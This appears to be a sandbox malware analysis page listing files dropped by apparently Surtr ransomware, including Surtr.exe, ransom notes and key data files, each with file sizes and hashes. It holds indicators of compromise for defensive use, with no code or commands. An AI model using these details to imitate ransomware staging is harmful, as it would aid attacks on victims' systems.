                                                                                                                                                                                                                                                                    MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                                    • C:\ProgramData\Service\ID_DATA.surt

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      14B

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      aeb13ec2ac32101e4e5aec65859d8086

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      c33410be852900bb5ba25a6a4a4a2a5fb7064103

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      39180cd4dddbb26656efee8a8e83b6a786fc29beb27b5d833d5949e75225c4bf

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      bdb1ce8ecc1c0d47b728a269e64d9fc8f9d70363e41032e6dbd71d1ebe8b8bedb442d9744d2b0476861610b6a08873920bce3d80358d7233d318590f9e485494

                                                                                                                                                                                                                                                                    • C:\ProgramData\Service\PrivateData_7i3ng65rjpb8y4.surt

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      c38fdcd30969b68eda6054f9088d3465

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      0c9e28c77eaff2747e9a6990d5796f250702bd2b

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      57ed17d2baa1fc8a99394050dfd48dc7cd99f48e80616eaecdaa4c6bc8f9d559

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      8a785becc287f7b1978c1b001e8cb2abb19ee275849db941585b280ec988b11fc198e6e51b87e3f9640b801eb64714928ba673f9ea6335c2e6ff887f7e7dc6ef

                                                                                                                                                                                                                                                                    • C:\ProgramData\Service\PublicData_7i3ng65rjpb8y4.surt

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      204B

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      d4f833db1ddc5db6ef768876958b1a84

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      6272d3832717108522640d38ad24351b5476829b

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      1a6e5c8571f62acecfaceba17cc565a834f9f5d638a2dd019fef641791bdda25

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      7f9e7b26490fc8b9d87b6f6eb421cecc23564b4783af9517f330ec4882350182b6231eceae565f4f743dfff1d86fdf6598ca1e88f2df4b68ed155e40df212578

                                                                                                                                                                                                                                                                    • C:\ProgramData\Service\SURTR_README.hta

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      f0e68fb05c7fba4fd22ecf280636b3ff

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      3063f8ee0cc12095f2686855cccb43e7743ea7b9

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      3119dad6d962b6c8c4ed49f76daa84e670a025b2f44ca5187d813129a6cb7579

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      4ebf9f52cfdc5b3d8ca74fbc865cc5eb687873efd4828b0d326a1756029cd8b1f481620e65b1043ff28f34dddf037bb0f7e1b379cb995abcc998ec41962f16b4

                                                                                                                                                                                                                                                                    • C:\ProgramData\Service\SURTR_README.txt

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      625B

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      18e8d36b7d4515fd1648f34bdcd2dcee

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      8b23c193353ec723b9d1be124a9ed433aaf133ab

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      36cf995d262fd396a391cb0138df5770b2e0123dd4928b0a4295198b1db28f2b

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      271e5327c915baf2b2c9d021a62bcdd6081c8328b1ecc0299778faf062ee3c6e4aec27ddbfacd7f7a87b2ef5d15a9c20866c818af613f52aecb6074f1ec58f6e

                                                                                                                                                                                                                                                                    • C:\ProgramData\Service\Surtr.exe

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      1.1MB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      ad539ebdf9e34e02be487134cf9a6713

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      b5af8a12c5a6ed369debaad7eab59e3cb1715e2d

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      386291d7dd9fa62f7514e784a238bd7a5099a0d2edd8af6085c61e3953a6914faf3dc299f07d56bed3b5b337a18c8b636c84f88693d3bc2512f8dfd51e711492